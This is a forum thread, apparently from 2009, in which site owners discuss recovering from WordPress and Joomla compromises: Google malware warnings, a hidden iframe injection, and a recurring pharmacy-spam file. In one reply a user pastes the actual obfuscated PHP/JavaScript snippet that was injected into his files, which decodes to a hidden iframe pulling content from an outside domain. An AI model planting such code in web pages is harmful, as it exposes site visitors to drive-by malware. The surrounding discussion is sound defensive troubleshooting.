Google quarantined me

nomos

nomos

Administrator
This morning I got an email from Google with the subject line "Malware notification regarding deeptime.net." At first, I thought it was a phishing thing but then when I visited my sites in Firefox I was greeted with the big red "Reported Attack Site!" page. See for yourself: http://www.deeptime.net/blog/

Looking at the diagnostic in Google Webmaster Tools I get the following message which suggests that it's not actually my site at all that's the problem but this davtraff.com. I did a quick search on the domain and found people saying things like "If I catch this davtraff guy I'll punch him in the neck."

Anyway, my site is fucked and I have no idea what to do besides submit it for a review. But if anyone can offer any ideas or help I'd really appreciate it.


What is the current listing status for deeptime.net?
Site is listed as suspicious - visiting this web site may
harm your computer.

Part of this site was listed for suspicious activity 1 time(s)
over the past 90 days.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90
days, 4 page(s) resulted in malicious software being
downloaded and installed without user consent. The last
time Google visited this site was on 2009-11-04, and the
last time suspicious content was found on this site was
on 2009-11-04.

Malicious software is hosted on 1 domain(s), including
davtraff.com/.

This site was hosted on 1 network(s) including AS26347
(DREAMHOST).

Has this site acted as an intermediary resulting in further
distribution of malware?
Over the past 90 days, deeptime.net did not appear to
function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the
past 90 days.

How did this happen?
In some cases, third parties can add malicious code to
legitimate sites, which would cause us to show the
warning message.
Click to expand...
 
D

droid

Guest
I was running some WP blogs in work that got hacked with random links inserted into the text via javascript. This was inserted into each PHP file on the server:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

What version of wordpress are you running? I had to manually remove the offending code and upgrade.
 
sufi

sufi

lala
this happened to some of my webpages, i still am not really sure how - it looked like someone ftped in and added 3 lines of code to all html files, which downloaded some malicious javascripts that google disliked.
i did have to do a lot of find/replace, and change some passwords, but i was rehabilitated with google in a couple of days...

blacklisted by google = :cool:
 
sufi

sufi

lala
Scan type: Auto-Protect Scan
Event: Security Risk Found!
Risk: Bloodhound.Exploit.193
File: C:\Documents and Settings\!!sufi!!\Local Settings\Temporary Internet Files\Content.IE5\0S5524X9\freeLooks[1].swf
Location: Unknown Storage
Action taken: Clean failed : Quarantine failed : Access denied
Date found: 05 November 2009 15:08:22
Click to expand...
nice one!
not sure if i got that off droid's rash C&P or off of deeptime itself
(also never realised ibn sina invented deeptime, just goes to show...)
 
nomos

nomos

Administrator
thanks guys. so it sounds like a pain in the ass but not the end of the world. i might have some questions later though as i'm still unsure where to start and i have to run out at the moment.

massrock said:
Wait, so is it google who've blocked the site or Dreamhost?
Click to expand...
yeah it's google that does the scans and designates 'attack sites.' firefox and safari receive the information and generate warning pages in front of the sites. the only thing that dreamhost has done is repeat the warning to me when i go to my control panel.
 
nomos

nomos

Administrator
thanks again. i'll go through that when i'm home. so far I've found 2 of those iframes

droid said:
What version of wordpress are you running? I had to manually remove the offending code and upgrade.
Click to expand...
I think I'm on 2.5.7. Looks like the same route for me. Riddim.ca got hit with it as well. It's on Joomla rather than WP.

Find and Replace party at mine tonight :cool:
 
Last edited:
nomos

nomos

Administrator
So it's called an iframe injection attack. A couple of IT friends have sent some tips and links that correspond with what's been said above. Sounds like it's not very serious but dealing with it will take a while - lots of backing up, reinstalling, etc.

Some reading for anyone else who might have to deal with this sort of thing...

http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://eisabainyo.net/weblog/2009/04/06/iframe-injection-attack/

I wouldn't be surprised if it came in via my very out-of-date Joomla install then spread to my wordpress blogs. It happened either through a compromised password or a worm on my computer, which I never expect, being on a mac.
 
N

Ness Rowlah

Norwegian Wood
>> Temporary Internet Files\Content.IE5

I am not sure, but if I take that as running IE5 then you really live in
the dark ages? There is no excuse for running that (unless you are at work and company policy and all that bollox).
 
nomos

nomos

Administrator
i worked on this til the we hours last night and i believe i've cleaned it all up. riddim.ca was obliterated in the process but i still have the data so it'll come back in a while. unfortunately another sub site might be gone for god. anyway, just waiting for the green light from google now.
 
nomos

nomos

Administrator
NEW PROBLEM :mad:

The other day I Googled an entry on my blog and, in the search results, the page title had been hijacked by "Viagra, Cialis, etc."

It wasn't an iFrame injection attack this time. Instead I found a file called "whois.da" at the root of each of my domains. Had a look inside and it contained hundreds of links to an online pharmacy.

So I changed my FTP passwords. But just now I checked and it's back.

Searching "whois.dat" produces nothing. Anyone have any idea what's going on here? It seems less likey that WordPress is the entry point this time. All of my passwords are supposed to be very strong.
 
john eden

john eden

male pale and stale
Sorry to hear that Paul - what else was on the site?

I only ask because mine got hacked last year through the shop - I was using an out of date version of the software because upgrading was such a pain.

All they did was insert fake bank pages, so it was easy to stop.
 
D

droid

Guest
Do you have any out of date plug-ins or add-ons to the site? A .dat file is basically just a text file. The .dat files are writeable by the server, so typically when some attacker finds a way into your site (usually by exploiting some other out-of-date open source app) they write a little script to trawl over any writeable files in your document root and scrawl all over them with bad stuff. It might be an idea to check if there's any other writable files in there too.
 
nomos

nomos

Administrator
I've got several WordPress installs on there. I wondered last night if somehow they might be opening a backdoor, so I deleted the disused ones, updated the rest, and password protected a couple that needn't be publicly accessible. I'll weed out and update my plugins to see if that helps.

Frustrating if WP is the entry point but a little more reassuring than the idea that someone/something keeps cracking these passwords.

Thanks guys. ;) I'll report back.
 
Last edited:
D

droid

Guest
It may not have been a password crack. If you have old wordpress installs that havent been updated then hackers can get in using published vulnerabilities, the same goes with plug-ins. If anything Id say its unlikely the passwords were hacked. Its almost certainly an out of date plugin or WP install.
 
You must log in or register to reply here.
Top